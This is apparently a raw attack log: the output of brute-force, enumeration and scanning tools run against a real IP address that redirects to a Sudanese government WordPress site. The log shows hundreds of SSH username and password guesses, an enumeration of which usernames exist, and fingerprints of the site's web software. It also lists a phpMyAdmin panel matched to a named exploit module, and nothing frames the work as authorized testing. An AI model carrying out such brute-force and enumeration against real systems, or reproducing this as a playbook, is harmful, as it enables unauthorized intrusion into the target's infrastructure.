- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: guest:iloveu
- NSE: [ssh-brute] Trying username/password pair: user:iloveu
- NSE: [ssh-brute] Trying username/password pair: web:iloveu
- NSE: [ssh-brute] Trying username/password pair: test:iloveu
- NSE: [ssh-brute] Trying username/password pair: root:michelle
- NSE: [ssh-brute] Trying username/password pair: admin:michelle
- NSE: [ssh-brute] Trying username/password pair: administrator:michelle
- NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: guest:michelle
- NSE: [ssh-brute] Trying username/password pair: user:michelle
- NSE: [ssh-brute] Trying username/password pair: web:michelle
- NSE: [ssh-brute] Trying username/password pair: test:michelle
- NSE: [ssh-brute] Trying username/password pair: root:tigger
- NSE: [ssh-brute] Trying username/password pair: admin:tigger
- NSE: [ssh-brute] Trying username/password pair: administrator:tigger
- NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: guest:tigger
- NSE: [ssh-brute] Trying username/password pair: user:tigger
- NSE: [ssh-brute] Trying username/password pair: web:tigger
- NSE: [ssh-brute] Trying username/password pair: test:tigger
- NSE: [ssh-brute] Trying username/password pair: root:sunshine
- NSE: [ssh-brute] Trying username/password pair: admin:sunshine
- NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
- NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: guest:sunshine
- NSE: [ssh-brute] Trying username/password pair: user:sunshine
- NSE: [ssh-brute] Trying username/password pair: web:sunshine
- NSE: [ssh-brute] Trying username/password pair: test:sunshine
- NSE: [ssh-brute] Trying username/password pair: root:chocolate
- NSE: [ssh-brute] Trying username/password pair: admin:chocolate
- NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
- NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: guest:chocolate
- NSE: [ssh-brute] Trying username/password pair: user:chocolate
- NSE: [ssh-brute] Trying username/password pair: web:chocolate
- NSE: [ssh-brute] Trying username/password pair: test:chocolate
- NSE: [ssh-brute] Trying username/password pair: root:password1
- NSE: [ssh-brute] Trying username/password pair: admin:password1
- NSE: [ssh-brute] Trying username/password pair: administrator:password1
- NSE: [ssh-brute] Trying username/password pair: webadmin:password1
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
- NSE: [ssh-brute] Trying username/password pair: netadmin:password1
- NSE: [ssh-brute] Trying username/password pair: guest:password1
- NSE: [ssh-brute] Trying username/password pair: user:password1
- NSE: [ssh-brute] Trying username/password pair: web:password1
- NSE: [ssh-brute] Trying username/password pair: test:password1
- NSE: [ssh-brute] Trying username/password pair: root:soccer
- NSE: [ssh-brute] Trying username/password pair: admin:soccer
- NSE: [ssh-brute] Trying username/password pair: administrator:soccer
- NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: guest:soccer
- NSE: [ssh-brute] Trying username/password pair: user:soccer
- NSE: [ssh-brute] Trying username/password pair: web:soccer
- NSE: [ssh-brute] Trying username/password pair: test:soccer
- NSE: [ssh-brute] Trying username/password pair: root:anthony
- NSE: [ssh-brute] Trying username/password pair: admin:anthony
- NSE: [ssh-brute] Trying username/password pair: administrator:anthony
- NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: guest:anthony
- NSE: [ssh-brute] Trying username/password pair: user:anthony
- NSE: [ssh-brute] Trying username/password pair: web:anthony
- NSE: [ssh-brute] Trying username/password pair: test:anthony
- NSE: [ssh-brute] Trying username/password pair: root:friends
- NSE: [ssh-brute] Trying username/password pair: admin:friends
- NSE: [ssh-brute] Trying username/password pair: administrator:friends
- NSE: [ssh-brute] Trying username/password pair: webadmin:friends
- NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
- NSE: [ssh-brute] Trying username/password pair: netadmin:friends
- NSE: [ssh-brute] Trying username/password pair: guest:friends
- NSE: [ssh-brute] Trying username/password pair: user:friends
- NSE: [ssh-brute] Trying username/password pair: web:friends
- NSE: [ssh-brute] Trying username/password pair: test:friends
- NSE: [ssh-brute] Trying username/password pair: root:purple
- NSE: [ssh-brute] Trying username/password pair: admin:purple
- NSE: [ssh-brute] Trying username/password pair: administrator:purple
- NSE: [ssh-brute] Trying username/password pair: webadmin:purple
- NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
- NSE: [ssh-brute] Trying username/password pair: netadmin:purple
- NSE: [ssh-brute] Trying username/password pair: guest:purple
- NSE: [ssh-brute] Trying username/password pair: user:purple
- NSE: [ssh-brute] Trying username/password pair: web:purple
- NSE: [ssh-brute] Trying username/password pair: test:purple
- NSE: [ssh-brute] Trying username/password pair: root:angel
- NSE: [ssh-brute] Trying username/password pair: admin:angel
- NSE: [ssh-brute] Trying username/password pair: administrator:angel
- NSE: [ssh-brute] Trying username/password pair: webadmin:angel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
- NSE: [ssh-brute] Trying username/password pair: netadmin:angel
- NSE: [ssh-brute] Trying username/password pair: guest:angel
- NSE: [ssh-brute] Trying username/password pair: user:angel
- NSE: [ssh-brute] Trying username/password pair: web:angel
- NSE: [ssh-brute] Trying username/password pair: test:angel
- NSE: [ssh-brute] Trying username/password pair: root:butterfly
- NSE: [ssh-brute] Trying username/password pair: admin:butterfly
- NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
- NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: guest:butterfly
- NSE: [ssh-brute] Trying username/password pair: user:butterfly
- NSE: [ssh-brute] Trying username/password pair: web:butterfly
- NSE: [ssh-brute] Trying username/password pair: test:butterfly
- NSE: [ssh-brute] Trying username/password pair: root:jordan
- NSE: [ssh-brute] Trying username/password pair: admin:jordan
- NSE: [ssh-brute] Trying username/password pair: administrator:jordan
- NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: guest:jordan
- NSE: [ssh-brute] Trying username/password pair: user:jordan
- NSE: [ssh-brute] Trying username/password pair: web:jordan
- NSE: [ssh-brute] Trying username/password pair: test:jordan
- NSE: [ssh-brute] Trying username/password pair: root:fuckyou
- NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
- NSE: [ssh-brute] Trying username/password pair: user:fuckyou
- NSE: [ssh-brute] Trying username/password pair: web:fuckyou
- NSE: [ssh-brute] Trying username/password pair: test:fuckyou
- NSE: [ssh-brute] Trying username/password pair: root:123123
- NSE: [ssh-brute] Trying username/password pair: admin:123123
- NSE: [ssh-brute] Trying username/password pair: administrator:123123
- NSE: [ssh-brute] Trying username/password pair: webadmin:123123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
- NSE: [ssh-brute] Trying username/password pair: netadmin:123123
- NSE: [ssh-brute] Trying username/password pair: guest:123123
- NSE: [ssh-brute] Trying username/password pair: user:123123
- NSE: [ssh-brute] Trying username/password pair: web:123123
- NSE: [ssh-brute] Trying username/password pair: test:123123
- NSE: [ssh-brute] Trying username/password pair: root:justin
- NSE: [ssh-brute] Trying username/password pair: admin:justin
- NSE: [ssh-brute] Trying username/password pair: administrator:justin
- NSE: [ssh-brute] Trying username/password pair: webadmin:justin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
- NSE: [ssh-brute] Trying username/password pair: netadmin:justin
- NSE: [ssh-brute] Trying username/password pair: guest:justin
- NSE: [ssh-brute] Trying username/password pair: user:justin
- NSE: [ssh-brute] Trying username/password pair: web:justin
- NSE: [ssh-brute] Trying username/password pair: test:justin
- NSE: [ssh-brute] Trying username/password pair: root:liverpool
- NSE: [ssh-brute] Trying username/password pair: admin:liverpool
- NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
- NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: guest:liverpool
- NSE: [ssh-brute] Trying username/password pair: user:liverpool
- NSE: [ssh-brute] Trying username/password pair: web:liverpool
- NSE: [ssh-brute] Trying username/password pair: test:liverpool
- NSE: [ssh-brute] Trying username/password pair: root:football
- NSE: [ssh-brute] Trying username/password pair: admin:football
- NSE: [ssh-brute] Trying username/password pair: administrator:football
- NSE: [ssh-brute] Trying username/password pair: webadmin:football
- NSE: [ssh-brute] Trying username/password pair: sysadmin:football
- NSE: [ssh-brute] Trying username/password pair: netadmin:football
- NSE: [ssh-brute] Trying username/password pair: guest:football
- NSE: [ssh-brute] Trying username/password pair: user:football
- NSE: [ssh-brute] Trying username/password pair: web:football
- NSE: [ssh-brute] Trying username/password pair: test:football
- NSE: [ssh-brute] Trying username/password pair: root:loveme
- NSE: [ssh-brute] Trying username/password pair: admin:loveme
- NSE: [ssh-brute] Trying username/password pair: administrator:loveme
- NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: guest:loveme
- NSE: [ssh-brute] Trying username/password pair: user:loveme
- NSE: [ssh-brute] Trying username/password pair: web:loveme
- NSE: [ssh-brute] Trying username/password pair: test:loveme
- NSE: [ssh-brute] Trying username/password pair: root:secret
- Nmap scan report for 37.58.63.157
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- | gssapi-with-mic
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 421 guesses in 181 seconds, average tps: 2.6
- | ssh-hostkey:
- | 2048 f9:ea:f1:f9:88:4c:35:23:4f:31:fb:38:17:f9:40:39 (RSA)
- | 256 8c:07:13:65:fe:ef:69:09:f4:fb:ee:49:91:5a:33:38 (ECDSA)
- |_ 256 37:44:b4:9d:a4:1f:48:a1:d0:60:fe:4a:73:6c:99:67 (ED25519)
- | ssh-publickey-acceptance:
- |_ Accepted Public Keys: No public keys accepted
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (94%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), HP P2000 G3 NAS device (93%), Linux 3.12 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 24.85 ms 10.246.200.1
- 2 20.86 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 32.80 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
- 4 25.88 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 27.10 ms motl-b1-link.telia.net (62.115.162.41)
- 6 124.79 ms nyk-bb4-link.telia.net (62.115.134.52)
- 7 124.82 ms ldn-bb4-link.telia.net (62.115.112.245)
- 8 124.82 ms prs-bb4-link.telia.net (62.115.114.229)
- 9 124.78 ms ffm-bb3-link.telia.net (62.115.123.12)
- 10 146.82 ms ffm-b10-link.telia.net (62.115.137.211)
- 11 119.86 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
- 12 118.83 ms po-7.ce02.fra-10.de.leaseweb.net (178.162.223.159)
- 13 ...
- 14 118.82 ms 37.58.63.157
- #######################################################################################################################################
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => 37.58.63.157
- RHOST => 37.58.63.157
- [*] 37.58.63.157:22 - SSH - Using malformed packet technique
- [*] 37.58.63.157:22 - SSH - Starting scan
- [-] 37.58.63.157:22 - SSH - User 'admin' not found
- [-] 37.58.63.157:22 - SSH - User 'administrator' not found
- [-] 37.58.63.157:22 - SSH - User 'anonymous' not found
- [-] 37.58.63.157:22 - SSH - User 'backup' not found
- [-] 37.58.63.157:22 - SSH - User 'bee' not found
- [+] 37.58.63.157:22 - SSH - User 'ftp' found
- [-] 37.58.63.157:22 - SSH - User 'guest' not found
- [-] 37.58.63.157:22 - SSH - User 'GUEST' not found
- [-] 37.58.63.157:22 - SSH - User 'info' not found
- [+] 37.58.63.157:22 - SSH - User 'mail' found
- [-] 37.58.63.157:22 - SSH - User 'mailadmin' not found
- [-] 37.58.63.157:22 - SSH - User 'msfadmin' not found
- [+] 37.58.63.157:22 - SSH - User 'mysql' found
- [+] 37.58.63.157:22 - SSH - User 'nobody' found
- [-] 37.58.63.157:22 - SSH - User 'oracle' not found
- [-] 37.58.63.157:22 - SSH - User 'owaspbwa' not found
- [+] 37.58.63.157:22 - SSH - User 'postfix' found
- [-] 37.58.63.157:22 - SSH - User 'postgres' not found
- [-] 37.58.63.157:22 - SSH - User 'private' not found
- [-] 37.58.63.157:22 - SSH - User 'proftpd' not found
- [-] 37.58.63.157:22 - SSH - User 'public' not found
- [+] 37.58.63.157:22 - SSH - User 'root' found
- [-] 37.58.63.157:22 - SSH - User 'superadmin' not found
- [-] 37.58.63.157:22 - SSH - User 'support' not found
- [-] 37.58.63.157:22 - SSH - User 'sys' not found
- [-] 37.58.63.157:22 - SSH - User 'system' not found
- [-] 37.58.63.157:22 - SSH - User 'systemadmin' not found
- [-] 37.58.63.157:22 - SSH - User 'systemadministrator' not found
- [-] 37.58.63.157:22 - SSH - User 'test' not found
- [-] 37.58.63.157:22 - SSH - User 'tomcat' not found
- [-] 37.58.63.157:22 - SSH - User 'user' not found
- [-] 37.58.63.157:22 - SSH - User 'webmaster' not found
- [-] 37.58.63.157:22 - SSH - User 'www-data' not found
- [-] 37.58.63.157:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:29 EDT
- Nmap scan report for 37.58.63.157
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain (unknown banner: none)
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- |_dns-nsec-enum: Can't determine domain for host 37.58.63.157; use dns-nsec-enum.domains script arg.
- |_dns-nsec3-enum: Can't determine domain for host 37.58.63.157; use dns-nsec3-enum.domains script arg.
- | dns-nsid:
- |_ bind.version: none
- | fingerprint-strings:
- | DNSVersionBindReqTCP:
- | version
- | bind
- |_ none
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port53-TCP:V=7.70%I=7%D=5/2%Time=5CCAD4B8%P=x86_64-pc-linux-gnu%r(DNSVe
- SF:rsionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x0
- SF:4bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0
- SF:\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (92%), Linux 3.2 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- Host script results:
- |_dns-brute: Can't guess domain of "37.58.63.157"; use dns-brute.domain script argument.
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 20.97 ms 10.246.200.1
- 2 22.01 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 26.52 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
- 4 20.52 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 26.89 ms motl-b1-link.telia.net (62.115.162.41)
- 6 120.00 ms nyk-bb4-link.telia.net (62.115.134.52)
- 7 122.32 ms ldn-bb3-link.telia.net (62.115.113.21)
- 8 119.98 ms prs-bb3-link.telia.net (62.115.134.92)
- 9 120.06 ms ffm-bb4-link.telia.net (62.115.114.99)
- 10 119.54 ms ffm-b10-link.telia.net (62.115.137.211)
- 11 114.60 ms leaseweb-ic-146205-ffm-b10.c.telia.net (80.239.132.74)
- 12 114.22 ms po-7.ce02.fra-10.de.leaseweb.net (178.162.223.159)
- 13 116.60 ms hosted-by.leaseweb.com (46.165.226.255)
- 14 114.35 ms 37.58.63.157
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:30 EDT
- Nmap scan report for 37.58.63.157
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 14 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 25.56 ms 10.246.200.1
- 2 21.16 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 42.84 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
- 4 20.23 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 26.87 ms motl-b1-link.telia.net (62.115.162.41)
- 6 124.40 ms nyk-bb3-link.telia.net (62.115.137.142)
- 7 124.45 ms ldn-bb4-link.telia.net (62.115.112.245)
- 8 121.27 ms prs-bb4-link.telia.net (62.115.114.229)
- 9 120.62 ms ffm-bb4-link.telia.net (62.115.114.99)
- 10 119.84 ms ffm-b10-link.telia.net (62.115.137.211)
- 11 113.42 ms leaseweb-ic-146205-ffm-b10.c.telia.net (80.239.132.74)
- 12 113.18 ms po-7.ce02.fra-10.de.leaseweb.net (178.162.223.159)
- 13 120.71 ms hosted-by.leaseweb.com (46.165.226.255)
- 14 113.29 ms 37.58.63.157
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://dawa.gov.sd...
- ________________________________________ SITE INFO _________________________________________
- IP Title
- 37.58.63.157
- _________________________________________ VERSION __________________________________________
- Name Versions Type
- WordPress 5.0.4 CMS
- Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.4 | 2.4.5 | 2.4.6 | 2.4.7 Platform
- 2.4.8 | 2.4.9
- PHP 7.0.33 Platform
- _______________________________________ INTERESTING ________________________________________
- URL Note Type
- /robots.txt robots.txt index Interesting
- /readme.html Readme file Interesting
- /login/ Login Page Interesting
- __________________________________________ TOOLS ___________________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- ____________________________________________________________________________________________
- Time: 1.1 sec Urls: 522 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Thu, 02 May 2019 11:32:49 GMT
- Content-Type: text/html; charset=UTF-8
- X-Powered-By: PHP/7.0.33
- Vary: Accept-Encoding,Cookie
- Cache-Control: max-age=3, must-revalidate
- X-Cache-Status: MISS
- X-Powered-By: PleskLin
- Connection: keep-alive
- HTTP/1.1 200 OK
- Date: Thu, 02 May 2019 11:32:50 GMT
- Content-Type: text/html; charset=UTF-8
- X-Powered-By: PHP/7.0.33
- Vary: Accept-Encoding,Cookie
- Cache-Control: max-age=3, must-revalidate
- X-Cache-Status: HIT
- X-Powered-By: PleskLin
- Connection: keep-alive
- #######################################################################################################################################
- OWL Carousel
- PHP 7.0.33
- WordPress Super Cache
- Revslider
- jQuery 1.12.4
- jQuery Migrate
- Underscore.js 1.8.3
- WordPress
- X-Cache-Status: STALE
- #######################################################################################################################################
- https://37.58.63.157 [301 Moved Permanently] Country[GERMANY][DE], HTTPServer[nginx], IP[37.58.63.157], PHP[7.0.33,], Plesk[Lin], RedirectLocation[https://dawa.gov.sd/], UncommonHeaders[x-cache-status], X-Powered-By[PHP/7.0.33, PleskLin], nginx
- https://dawa.gov.sd/ [200 OK] Country[GERMANY][DE], HTML5, HTTPServer[nginx], IP[37.58.63.157], JQuery[1.12.4], MetaGenerator[Powered by Slider Revolution 5.2.3.5 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface.,Powered by Visual Composer - drag and drop page builder for WordPress.,WordPress 5.0.4], PHP[7.0.33,], Plesk[Lin], PoweredBy[Slider,Visual], Script[text/javascript], UncommonHeaders[x-cache-status], WordPress[5.0.4], WordpressSuperCache, X-Powered-By[PHP/7.0.33, PleskLin], nginx
- #######################################################################################################################################
- OWL Carousel
- PHP 7.0.33
- WordPress Super Cache
- Revslider
- jQuery 1.12.4
- jQuery Migrate
- Underscore.js 1.8.3
- WordPress
- X-Cache-Status: MISS
- #######################################################################################################################################
- Version: 1.11.13-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 37.58.63.157
- Testing SSL server 37.58.63.157 on port 443 using SNI name 37.58.63.157
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: Plesk
- Issuer: Plesk
- Not valid before: Jan 25 15:00:17 2017 GMT
- Not valid after: Jan 25 15:00:17 2018 GMT
- #######################################################################################################################################
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +------------+---------------------------------------+--------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +------------+---------------------------------------+--------------------------------------------------+----------+----------+
- | phpMyAdmin | https://37.58.63.157:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
- +------------+---------------------------------------+--------------------------------------------------+----------+----------+
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:42 EDT
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- NSE: Starting runlevel 1 (of 2) scan.
- Initiating NSE at 07:42
- Completed NSE at 07:42, 0.00s elapsed
- NSE: Starting runlevel 2 (of 2) scan.
- Initiating NSE at 07:42
- Completed NSE at 07:42, 0.00s elapsed
- Initiating Ping Scan at 07:42
- Scanning 37.58.63.157 [4 ports]
- Completed Ping Scan at 07:42, 0.06s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 07:42
- Completed Parallel DNS resolution of 1 host. at 07:42, 0.03s elapsed
- Initiating Connect Scan at 07:42
- Scanning 37.58.63.157 [65535 ports]
- Discovered open port 995/tcp on 37.58.63.157
- Discovered open port 993/tcp on 37.58.63.157
- Discovered open port 110/tcp on 37.58.63.157
- Discovered open port 143/tcp on 37.58.63.157
- Discovered open port 443/tcp on 37.58.63.157
- Discovered open port 80/tcp on 37.58.63.157
- Discovered open port 53/tcp on 37.58.63.157
- Discovered open port 22/tcp on 37.58.63.157
- Discovered open port 3306/tcp on 37.58.63.157
- Discovered open port 21/tcp on 37.58.63.157
- Increasing send delay for 37.58.63.157 from 0 to 5 due to max_successful_tryno increase to 5
- Connect Scan Timing: About 6.85% done; ETC: 07:50 (0:07:02 remaining)
- Discovered open port 465/tcp on 37.58.63.157
- Connect Scan Timing: About 15.42% done; ETC: 07:49 (0:05:34 remaining)
- Connect Scan Timing: About 24.08% done; ETC: 07:48 (0:04:47 remaining)
- Connect Scan Timing: About 32.82% done; ETC: 07:48 (0:04:08 remaining)
- Discovered open port 8443/tcp on 37.58.63.157
- Connect Scan Timing: About 41.81% done; ETC: 07:48 (0:03:30 remaining)
- Discovered open port 8880/tcp on 37.58.63.157
- Connect Scan Timing: About 50.51% done; ETC: 07:48 (0:02:57 remaining)
- Connect Scan Timing: About 59.47% done; ETC: 07:48 (0:02:24 remaining)
- Discovered open port 106/tcp on 37.58.63.157
- Connect Scan Timing: About 68.18% done; ETC: 07:48 (0:01:53 remaining)
- Discovered open port 4190/tcp on 37.58.63.157
- Connect Scan Timing: About 77.10% done; ETC: 07:48 (0:01:21 remaining)
- Discovered open port 7081/tcp on 37.58.63.157
- Discovered open port 7080/tcp on 37.58.63.157
- Connect Scan Timing: About 85.61% done; ETC: 07:48 (0:00:51 remaining)
